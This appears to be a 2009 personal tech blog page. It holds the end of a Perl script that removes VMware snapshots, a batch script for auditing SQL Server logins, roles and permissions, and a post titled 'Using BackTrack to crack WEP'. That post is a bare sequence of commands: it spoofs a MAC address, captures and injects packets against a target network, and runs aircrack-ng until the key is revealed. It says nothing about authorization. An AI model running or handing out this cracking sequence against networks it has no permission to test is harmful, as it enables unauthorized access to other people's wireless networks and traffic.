print " ----- Remove Snapshots of running VM's -----";
print "\n\n";
system("perl $RCLIPath/Perl/apps/vm/snapshotmanager.pl --url $url --username $username --password $password --operation remove --powerstatus poweredOn --snapshotname $snapshotname --children 1");
print "\n\n";

&actualtime();
print " ***** Script End ***************************";

#sub function to print the actual time in the log
sub actualtime
{
my ($Sekunden, $Minuten, $Stunden, $Monatstag, $Monat,
$Jahr, $Wochentag, $Jahrestag, $Sommerzeit) = localtime(time);
my $CTIME_String = localtime(time);
$Monat+=1;
$Jahrestag+=1;
$Monat = $Monat < 10 ? $Monat = "0".$Monat : $Monat;
$Monatstag = $Monatstag < 10 ? $Monatstag = "0".$Monatstag : $Monatstag;
$Stunden = $Stunden < 10 ? $Stunden = "0".$Stunden : $Stunden;
$Minuten = $Minuten < 10 ? $Minuten = "0".$Minuten : $Minuten;
$Sekunden = $Sekunden < 10 ? $Sekunden = "0".$Sekunden : $Sekunden;
$Jahr+=1900;

print "$Jahr-$Monat-$Monatstag $Stunden:$Minuten:$Sekunden";
}

Monday, June 22, 2009

SQL SERVER DATABASE SECURITY & USER REVIEW

Following pasted into a Batch file will extract information from SQL Database
You need to have SA priveledges to the SQL Dbase to run.

--->START SCRIPT<---
REM Replace % Server_Name % with ServerName
REM Replace % OUTPUT_PATH % with Output location
REM Replace % DB_Review % with Database name

ECHO -- Obtain all logins from the database
OSQL -E -S %Server_Name% -Q "use master select * from master.dbo.syslogins" -s "," -w2000 -E -o %OUTPUT_PATH%\syslogins.txt

ECHO -- Obtain patch version
OSQL -E -S %Server_Name% -Q "select @@version" -s "," -w2000 -E -o %OUTPUT_PATH%\version.txt

ECHO -- Obtain names of databases defined within the SQL server instance
OSQL -E -S %Server_Name% -Q "select name from master.dbo.sysdatabases" -s "," -w2000 -E -o %OUTPUT_PATH%\active_db.txt

ECHO -- Obtain users from database under analysis
OSQL -E -S %Server_Name% -Q "use %DB_REVIEW% select uid, name, createdate, updatedate, hasdbaccess, islogin, isntname, isntgroup, isntuser, issqluser, isaliased, issqlrole, isapprole from sysusers where islogin = 1" -s "," -w2000 -E -o %OUTPUT_PATH%\db_users.txt

ECHO -- Obtain users from master database
OSQL -E -S %Server_Name% -Q "use master select uid, name, createdate, updatedate, hasdbaccess, islogin, isntname, isntgroup, isntuser, issqluser, isaliased, issqlrole, isapprole from sysusers where islogin = 1" -s "," -w2000 -E -o %OUTPUT_PATH%\master_users.txt

ECHO -- Obtain authentication mode for the sql_server instance
OSQL -E -S %Server_Name% -Q "master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='%Reg_address%',@value_name='LoginMode'" -s "," -w2000 -E -o %OUTPUT_PATH%\Authen_mode.txt

ECHO -- Obtain advanced option parameters for sql server instance
OSQL -E -S %Server_Name% -Q "USE master EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE"
OSQL -E -S %Server_Name% -Q "master..sp_configure" -s "," -w2000 -E -o %OUTPUT_PATH%\configuration.txt

ECHO -- Obtain audit level being used
OSQL -E -S %Server_Name% -Q "master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='%Reg_address%',@value_name='AuditLevel'" -s "," -w2000 -E -o %OUTPUT_PATH%\Audit_level.txt

ECHO -- Obtain default login being used for NT authentication
OSQL -E -S %Server_Name% -Q "master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='%Reg_address%',@value_name='DefaultLogin'" -s "," -w2000 -E -o%OUTPUT_PATH%\Default_logon.txt

ECHO -- Obtain membership of all fixed server roles
OSQL -E -S %Server_Name% -Q "master..sp_helpsrvrolemember" -s "," -w2000 -E -o %OUTPUT_PATH%\srvrolemember.txt

ECHO -- Obtain all database roles (application and database) in database under review
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_helprole" -s "," -w2000 -E -o %OUTPUT_PATH%\DB_and_App_roles.txt

ECHO -- Obtain membership of all fixed and custom database roles
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_helprolemember" -s "," -w2000 -E -o %OUTPUT_PATH%\DB_roles.txt

ECHO -- Obtain permissions on stored procedures and tables in database under review
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_helprotect" -s "," -w2000 -E -o %OUTPUT_PATH%\permissions_DB.txt

ECHO -- Obtain permissions on stored procedures and tables in master
OSQL -E -S %Server_Name% -Q "master..sp_helprotect" -s "," -w2000 -E -o %OUTPUT_PATH%\permissions_master.txt

ECHO -- Obtain orphaned users in database under review
OSQL -E -S %Server_Name% -Q "%DB_REVIEW%..sp_change_users_login @Action='Report'" -s "," -w2000 -E -o %OUTPUT_PATH%\orphaned_users.txt

ECHO Extraction complete
PAUSE
--->END SCRIPT<---

Thursday, April 2, 2009

Using BackTrack to crack WEP

open Konsole - Type the following!

modprobe -r iwl3945

modprobe ipwraw

iwconfig

airmon-ng stop wifi0

ifconfig wifi0 down

macchanger --mac 00:11:22:33:44:55 wifi0

airmon-ng start wifi0

airodump-ng wifi0

airodump-ng -c 2 -w network.out --bssid [Target MAC Address] wifi0

aireplay-ng -1 0 -a [Target MAC Address] -h 00:11:22:33:44:55 -e [Target ESSID name] wifi0

aireplay-ng 2 -3 -b [Target MAC Address] -h 00:11:22:33:44:55 wifi0

aircrack-ng -n 128 -b [Target MAC Address] network.out-01.cap

Password will be revealed.

Followers